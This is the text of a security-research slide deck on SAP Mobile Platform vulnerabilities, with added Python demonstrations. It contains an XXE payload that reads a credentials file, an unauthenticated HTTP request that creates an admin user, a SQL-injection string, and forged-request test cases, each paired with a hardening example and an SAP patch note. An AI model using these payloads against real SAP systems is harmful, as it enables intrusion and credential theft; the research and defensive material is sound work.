Attacks on SAP Mobile

Post on 25-Jul-2015


Invest in security to secure investments

Attacks on SAP Mobile

Vahagn Vardanyan. ERPScan

Vahagn Vardanyan

SAP and Web application researcher

Specialist degree in information security


@vah_13

About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP

• Leader by number of acknowledgements from SAP (150+)

• 60+ presentations at key security conferences worldwide

• 25 Awards and nominations

• Research team - 20 experts with experience in different areas of security

• Headquarters in Palo Alto (US) and Amsterdam (EU)


Agenda

• About SAP Mobile Platform
  – SAP Control Center
  – SAP SQL Anywhere services
  – SAP Mobile Server
• SAP Mobile Platform vulnerabilities
  – Decrypting the GIOP protocol
  – XXE in SAP Control Center
  – CSRF in SMP 3.0
  – Cassini 1.0
  – SQL Anywhere BoF
  – SAP EMR Unwired SQL injection
• Conclusion

SAP Mobile Platform


SMP architecture


SMP protocols

Protocol           SUP 2.1.3   SUP 2.2   SMP 2.3   SMP 3.0
SMP Messaging          x          x         x         x
SMP Replication        x          x         x         x
HTTP REST API                     x         x         x
SAP Agentry                                 x         x


SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server


SAP Control Center

• Working process: sccservice.exe

• Open ports:
  – 2100 (Messaging service)
  – 8282/8283 (SCC)
  – 9999 (RMI)


SQL Anywhere

• Version 3: 1992

………………………….

• Version 10: 2006 - renamed SQL Anywhere (high availability, intra-query parallelism, materialized views)

• Version 11: 2008 (full text search, BlackBerry support)

• Version 12: 2010 (support for spatial data)

• Version 16: April 18, 2013 - (faster synchronization and improved security)


SAP Mobile Server

• MobiLink

• AdminWebServices

• MlsrvWrapper

• InfoboxMultiplexer

• OBMO

• JMSBridge


SAP Mobile Server (MobiLink)


AdminWebServices

• Uses Cassini Web Server 1.0

• Listens to the local port 5100


SAP Mobile Platform vulnerabilities


Decrypting the SAP Mobile Platform GIOP protocol


• GIOP (General Inter-ORB Protocol) is the abstract protocol by which object request brokers (ORBs) communicate

• Spoken by mlsrv16.exe (MobiLink) on port 2000

XXE in the SAP Mobile Platform portal page

CVE-2015-2813


• Portal URL: https://IP_ADDR:8283/scc

• Configuration files: web.xml and services-config.xml

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

  <servlet-mapping>
    <servlet-name>MessageBrokerServlet</servlet-name>
    <url-pattern>/messagebroker/*</url-pattern>
  </servlet-mapping>

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

  <channel-definition id="scc-http"
                      class="mx.messaging.channels.HTTPChannel">
    <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
              class="flex.messaging.endpoints.HTTPEndpoint" />
  </channel-definition>

Endpoints reachable under the /messagebroker/* mapping:

1. /scc/messagebroker/amfpolling

2. /scc/messagebroker/amfsecurepolling

3. /scc/messagebroker/http

4. /scc/messagebroker/httpsecure

5. /scc/messagebroker/amflongpolling

Read file with XXE

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d
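The file read shown above, reproduced as an added example rather than ERPScan's own proof of concept or any SAP code: the message endpoint is replaced by a local XML parse, the target file is a constructed stand-in for sup.properties written to a temporary directory, and the `<amfx>` envelope is a placeholder because the slides do not show the exact message format the endpoint expects. The same payload is then fed to a hardened parser that refuses DTDs, which is the fix a practitioner applies on the server side. POSIX paths are assumed for the file:// URL.

```python
"""XXE against an XML message endpoint: vulnerable parse beside the hardened one.

Added example; not ERPScan's proof of concept and not SAP code. The
/scc/messagebroker/http endpoint is replaced by a local XML parse, and the
target file is a constructed stand-in for sup.properties written to a temp
directory. POSIX paths are assumed for the file:// URL.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Property line copied from the slides; the file around it is constructed here.
SAMPLE_PROPERTIES = (
    "sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d\n"
)


def write_sample_properties() -> str:
    """Write the stand-in sup.properties and return its absolute path."""
    path = os.path.join(tempfile.mkdtemp(), "sup.properties")
    with open(path, "w", encoding="ascii") as fh:
        fh.write(SAMPLE_PROPERTIES)
    return path


def build_xxe_payload(target_file: str) -> bytes:
    """In-band XXE: declare an external entity that points at a local file and
    reference it in an element whose text the server echoes back.
    The <amfx> envelope is a placeholder; the slides do not show the exact
    message format the endpoint expects."""
    sysid = "file://" + target_file  # absolute POSIX path -> file:///...
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE amfx [\n"
        f'  <!ENTITY xxe SYSTEM "{sysid}">\n'
        "]>\n"
        '<amfx ver="3"><body>&xxe;</body></amfx>\n'
    ).encode()


class _TextCollector(ContentHandler):
    """Collects character data, standing in for whatever the server reflects."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_like_vulnerable_server(payload: bytes) -> str:
    """Parse with external general entities enabled, which is what an
    unhardened XML parser does; the file content comes back as text."""
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, True)  # the dangerous setting
    parser.parse(io.BytesIO(payload))
    return "".join(collector.parts)


def parse_hardened(payload: bytes) -> str:
    """Reject any DTD up front (a message endpoint has no legitimate use for
    one) and keep external entity resolution off as a second line of defence."""
    if b"<!DOCTYPE" in payload or b"<!ENTITY" in payload:
        raise ValueError("DTD or entity declaration in request body")
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, False)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.parts)


def demo() -> dict:
    """Run both parsers over the same payload and report what each yields."""
    target = write_sample_properties()
    payload = build_xxe_payload(target)
    leaked = parse_like_vulnerable_server(payload)
    try:
        parse_hardened(payload)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked_upa": "sup.imo.upa" in leaked, "hardened_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Against a real target the payload goes in the body of a POST to the endpoint, and the entity reference has to sit in a field the server echoes back; the DOCTYPE rejection in `parse_hardened` is the same rule libraries such as defusedxml apply, and it also stops billion-laughs style entity expansion, which a plain "no external entities" switch does not.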


Decrypt sup.imo.upa


SAP Mobile Platform unauthenticated access to other servlets

• Architecture and program vulnerabilities in SAP’s J2EE engine (BlackHat USA 2011)

• web.xml files revealed hidden methods to:
  – read and generate logs

Prevention

Install SAP security note 2125358 (SAP Mobile Platform XXE vulnerability)

CSRF in SMP 3.0


• addAdministrator

• addRepository

• removeServerLogs

• createApplication

• createBackendConnection
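Every operation in that list changes server state, so each one needs a CSRF check that a cross-site form cannot satisfy. The guard below is an added example, not SAP Mobile Platform code: only the operation names come from the slide, while the request model, header names, the admin origin and the HMAC token scheme are assumed, and the four requests it evaluates are constructed rather than captured.

```python
"""CSRF guard for the SMP admin operations listed above.

Added example; not SAP Mobile Platform code. The operation names come from
the slide, everything else (request model, header names, the admin origin,
the token scheme) is assumed, and the requests are constructed, not captured.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Admin operations from the slide: every one of them changes server state.
STATE_CHANGING = {
    "addAdministrator",
    "addRepository",
    "removeServerLogs",
    "createApplication",
    "createBackendConnection",
}

# Assumed origin of the management UI; 8283 is the SCC HTTPS port from the slides.
ADMIN_ORIGIN = "https://smp-admin.example.internal:8283"


@dataclass
class Request:
    method: str
    operation: str
    session_id: str            # the browser attaches this automatically (cookie)
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def issue_token(secret: bytes, session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC, so the server
    needs no token store and a token from one session fails in another."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_ok(req: Request) -> bool:
    """Origin first, Referer as fallback; absent both, refuse rather than trust."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    got, want = urlsplit(src), urlsplit(ADMIN_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def check_csrf(secret: bytes, req: Request) -> Tuple[bool, str]:
    """Return (allowed, reason). Reads pass; writes need POST, a matching
    origin and a valid token for this session, which a cross-site form
    cannot supply because it cannot read the victim's page."""
    if req.operation not in STATE_CHANGING:
        return True, "read-only operation"
    if req.method != "POST":
        return False, "state change requested over GET"
    if not _origin_ok(req):
        return False, "origin/referer does not match the admin UI"
    expected = issue_token(secret, req.session_id)
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf token"
    return True, "ok"


def demo() -> Dict[str, bool]:
    """Four constructed requests, all carrying the same logged-in admin session."""
    secret = secrets.token_bytes(32)
    sid = "JSESSIONID-example"
    token = issue_token(secret, sid)
    cases = {
        # the UI itself: POST, right origin, token embedded in its form
        "legit": Request("POST", "addAdministrator", sid,
                         {"Origin": ADMIN_ORIGIN},
                         {"login": "newadmin", "csrf_token": token}),
        # <img src=...> or a link on another site: GET, no token
        "forged_get": Request("GET", "removeServerLogs", sid,
                              {"Referer": "https://attacker.example/"}),
        # auto-submitting form on another site: POST, wrong origin, no token
        "forged_post": Request("POST", "addAdministrator", sid,
                               {"Origin": "https://attacker.example"},
                               {"login": "attacker"}),
        # passes the origin check but carries no token: still refused
        "no_token": Request("POST", "createApplication", sid,
                            {"Origin": ADMIN_ORIGIN}, {"name": "x"}),
    }
    return {name: check_csrf(secret, req)[0] for name, req in cases.items()}


if __name__ == "__main__":
    print(demo())
```

The token check is the part that actually closes the hole; the origin check is defence in depth for clients that omit the Origin header, and the method check exists because a state change reachable by GET can be triggered by nothing more than an image tag.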

Prevention

Install SAP security note 2114316 (SAP Mobile Platform CSRF vulnerability)

Cassini 1.0


AdminWebService

  POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
  Host: 127.0.0.1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: length

  strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100


SAP SQL Anywhere Buffer Overflow/Code Execution

CVE-2015-2819


SAP SQL Anywhere BoF/Code Execution

• CVE-2008-0912 – the MobiLink server is affected by a heap overflow that occurs while handling strings such as username, version and remote ID (all pre-auth) longer than 128 bytes

• CVE-2014-9264 – stack-based buffer overflow in the .NET Data Provider in SAP SQL Anywhere allows remote attackers to execute arbitrary code via a crafted column alias

First PSH request


SQL Anywhere BoF


Prevention

Install SAP security note 2108161 Denial of service in SAP SQL Anywhere


SAP EMR Unwired SQL injection

CVE-2013-7096


SAP EMR Unwired SQL injection

• CVE-2013-7096 (CVSS 7.5)

• AndroidManifest.xml:

  <provider android:name=".providers.ModiDataDbProvider"
            android:authorities="com.sap.mobi.docsprovider" />

Content URIs served by the provider:

1. content://com.sap.mobi.docsprovider/documents/offline_cat

2. content://com.sap.mobi.docsprovider/documents/offline/

3. content://com.sap.mobi.docsprovider/documents/sample

4. content://com.sap.mobi.docsprovider/documents/online

5. content://com.sap.mobi.docsprovider/documents/offline_auth

6. content://com.sap.mobi.docsprovider/documents/offline

7. content://com.sap.mobi.docsprovider/documents/online_auth

8. content://com.sap.mobi.docsprovider/documents/sample/

9. content://com.sap.mobi.docsprovider/documents/online_cat
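Any app on the same device can call a provider that is exported like this, and the classic failure is that the caller's selection string is concatenated into the provider's own WHERE clause. The model below is an added example, not the EMR Unwired code: only the authority and the URI paths come from the slide, while the table, its columns, the path-to-category mapping and the query builder are assumed so that the injectable query and its parameterised replacement can be run side by side on constructed data.

```python
"""SQL injection through an exported content provider, modelled with sqlite3.

Added example; not the EMR Unwired code. Only the provider's authority and
URI paths come from the slide. The table, its columns, the path-to-category
mapping and the query builder are assumed, so that the bug class (caller
supplied selection text concatenated into the provider's own WHERE clause)
and its fix can be run side by side.
"""
import sqlite3
from typing import Dict, List, Tuple

AUTHORITY = "com.sap.mobi.docsprovider"          # from the slide
PATH_TO_CATEGORY = {                              # assumed: URI path -> row category
    "documents/online": "online",
    "documents/offline": "offline",
    "documents/sample": "sample",
}
FILTERABLE_COLUMNS = {"id", "title"}              # what a caller may filter on


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one document per category plus a per-document
    backend token that another app on the device must never obtain."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE documents ("
        "id INTEGER PRIMARY KEY, title TEXT, category TEXT, auth_token TEXT)"
    )
    db.executemany(
        "INSERT INTO documents (title, category, auth_token) VALUES (?, ?, ?)",
        [
            ("Quarterly report", "online", "tok-online-1"),
            ("Cached chart", "offline", "tok-offline-1"),
            ("Demo deck", "sample", None),
        ],
    )
    return db


def _category(uri: str) -> str:
    """Map a content:// URI to the category the provider is meant to expose."""
    prefix = f"content://{AUTHORITY}/"
    if not uri.startswith(prefix):
        raise ValueError("unexpected authority")
    return PATH_TO_CATEGORY[uri[len(prefix):].rstrip("/")]


def query_vulnerable(db, uri: str, selection: str = "") -> List[Tuple]:
    """Mirrors a ContentProvider.query() that appends the caller's `selection`
    to its own category filter by string concatenation. The caller controls
    SQL text, so the "restriction" is theirs to remove."""
    sql = (
        "SELECT id, title, category, auth_token FROM documents "
        f"WHERE category = '{_category(uri)}'"
    )
    if selection:
        sql += " AND " + selection
    return db.execute(sql).fetchall()


def query_hardened(db, uri: str, filters: Dict[str, str]) -> List[Tuple]:
    """Caller passes column=value pairs, not SQL: columns are whitelisted,
    values are bound, the category filter cannot be bypassed and the token
    column is not in the projection at all."""
    sql = "SELECT id, title, category FROM documents WHERE category = ?"
    args = [_category(uri)]
    for column, value in filters.items():
        if column not in FILTERABLE_COLUMNS:
            raise ValueError(f"filtering on {column!r} is not permitted")
        sql += f" AND {column} = ?"
        args.append(value)
    return db.execute(sql, args).fetchall()


def demo() -> Dict[str, int]:
    """Row counts a hostile caller sees through each query path."""
    db = make_db()
    online = f"content://{AUTHORITY}/documents/online"
    # operator precedence does the work: category='online' AND 1=0 OR 1=1 -> every row
    dumped = query_vulnerable(db, online, "1=0 OR 1=1")
    safe = query_hardened(db, online, {})
    return {"vulnerable_rows": len(dumped), "hardened_rows": len(safe)}


if __name__ == "__main__":
    print(demo())
```

On Android the equivalent of `query_hardened` is a `SQLiteQueryBuilder` with a projection map and `setStrict(true)`, combined with `android:exported="false"` or a signature-level permission on the `<provider>`; merely wrapping the caller's selection in parentheses stops the `OR 1=1` trick but still allows blind extraction through subqueries.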


Prevention

Install SAP security note 1864518 Security Improvements for MOB-APP-EMR-AND


Conclusion


• SAP Guides
• Regular security assessments
• Monitoring technical security
• Segregation of Duties
• Security events monitoring

Each SAP landscape is unique and we pay close attention to the requirements of our customers and prospects. The ERPScan development team constantly addresses these specific needs and is actively involved in product advancement. If you wish to know whether our scanner addresses a particular aspect, or simply have a feature wish list, please e-mail us. We will be glad to consider your suggestions for future releases or monthly updates.

About

USA HQ: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301

EU HQ: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam

www.erpscan.com
info@erpscan.com